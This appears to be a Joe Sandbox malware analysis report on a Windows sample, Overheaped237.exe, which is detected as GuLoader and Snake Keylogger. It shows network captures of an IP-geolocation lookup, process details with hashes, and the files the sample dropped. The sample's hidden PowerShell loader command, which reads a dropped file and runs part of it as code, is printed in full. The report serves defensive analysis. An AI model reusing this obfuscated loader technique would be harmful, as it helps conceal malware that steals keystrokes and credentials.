2024-12-19 09:30:29 UTC	874	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:29 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 589398 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B12SMu5C06hdMjkPHxN6BBKrKHmwFvl0N6udGn1aMz89w50sZsxni9d557KVAFHnxrZjOv0VeC24wYTgOz%2FpoPZVfjrGIe57IIvqwuLto3atxDzGrjYWX8mvGUftkFxiqZ3ZldoB"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f465fd01f99425f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1575&min_rtt=1570&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1812538&cwnd=216&unsent_bytes=0&cid=ebf41a0410034bd7&ts=451&x=0"
2024-12-19 09:30:29 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49722	104.21.67.152	443	1912	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-19 09:30:32 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-12-19 09:30:32 UTC	880	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 09:30:32 GMT Content-Type: text/xml Content-Length: 362 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 589401 Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cFbsmMR7cm5J2SRvuHPM88Ak4Sorr3l%2BVi1vRBGDQz7JpBSjrHT7nHMlRkDBv0yIsSKDAw%2FGn0%2FxgKB0JayINICnUPD2PiXPCj4edn2IMsianMoNwe8RsIN%2BRQ%2Fi875Yzj8hHS4J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f465fe2c80c41de-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1588&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1830721&cwnd=225&unsent_bytes=0&cid=eda2fb87d1c8bf41&ts=448&x=0"
2024-12-19 09:30:32 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Target ID:	0
Start time:	04:28:28
Start date:	19/12/2024
Path:	C:\Users\user\Desktop\Overheaped237.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Overheaped237.exe"
Imagebase:	0x400000
File size:	587'656 bytes
MD5 hash:	8F4ADFD3B8C55670A99389BA3905E43D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	04:28:29
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell.exe -windowstyle hidden "$Circumcorneal=gc -raw 'C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd';$Liturgiernes=$Circumcorneal.SubString(18059,3);.$Liturgiernes($Circumcorneal) "
Imagebase:	0x860000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.2079055968.000000000CA7F000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	04:28:29
Start date:	19/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	04:29:33
Start date:	19/12/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x610000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000007.00000002.2681540329.0000000024E01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Overheaped237.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\justifikationssager.lnk

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5zk3ndpk.wko.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chngmwww.uap.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_huhrbshz.avo.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jbbiia4v.n2a.ps1

C:\Users\user\AppData\Local\Temp\nsc1A3D.tmp

C:\Users\user\AppData\Local\Temp\nst1CBF.tmp\nsExec.dll

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ekstensives.Bnd

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Udfring53.lev

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Ungallantness.kok

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Uplejedes.Ile

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\Yaply50.txt

C:\Users\user\AppData\Roaming\china\Mixeren\verbalises\Deinos253\rancheria.pro

Windows Analysis Report
Overheaped237.exe